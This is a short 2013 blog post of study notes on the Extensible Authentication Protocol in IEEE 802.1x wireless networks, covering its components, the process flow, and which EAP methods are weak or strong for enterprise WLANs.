Wednesday, 17 April 2013

Extensible Authentication Protocol - EAP

To validate users at Layer 2, a protocol called Extensible Authentication Protocol (EAP) is used within the IEEE 802.1x framework.

EAP operation, consists of three distinctive elements:

      Supplicant ------ Authenticator ------ Authentication Server

In WLANs a supplicant is a software running on a STA, authenticator is either an Access Point or Wireless Controller. The authentication server is usually a RADIUS server.

The authenticator maintains two virtual ports, an uncontrolled port and a controlled port. The uncontrolled port allows EAP authentication traffic to pass through, and the controlled port blocks all other traffic until the supplicant has been authenticated.

With EAP authentication protocols both server-side and client-side certificates can be used.

EAP messages are encapsulated in EAP over LAN (EAPOL) frames.

IEEE 802.1x/EAP authentication framework utilizes IEEE 802.11 Open System authentication. An STA will initially join a BSS (authenticate and associate at Layer 2) and will only proceed to Layer 3 (i.e DHCP request) if the entire IEEE 802.1x/EAP process is successful.

Generic EAP process flow:

1. Authenticator sends an EAP Request to a Supplicant when it connects to the network.

2. The Supplicant sends an EAP Response to the Authenticator, which embeds the EAP packet into a RADIUS request and sends it to Authentication Server.

3. The Authentication Server negotiates the EAP method for authentication. The Supplicant can acknowledge the EAP method that the EAP server suggests or, it can respond with a negative acknowledgement (NAK) and suggest a list of alternative EAP methods. The Authentication Server and the Supplicant must reach agreement about the EAP method to use to proceed with authentication.

Weak EAP Protocols:

   EAP-MD5:
   - One-way authentication only
   - Username sent in clear text
   - Weak MD5 Hash

   EAP-LEAP:
   - Pseudo-mutual authentication
   - Username sent in clear text
   - Weak MS-CHAPv2 Hash
   - Cisco proprietary

Strong EAP Protocols:

   EAP-PEAP:
   - EAP-PEAPv0 (EAP-MS-CHAPv2)
   - EAP-PEAPv0 (EAP-TLS)
   - EAP-PEAPv1 (EAP-GTC)

   EAP-TTLS

   EAP-TLS (most secure, highly recommended for use in enterprise WLAN)

   EAP-FAST (Cisco proprietary, uses PACs - Protected Access Credentials) 



References:

User Guide for the Cisco Secure Access Control System 5.2
CWSP Certified Wireless Security Professional Official Study Guide

No comments:

Post a Comment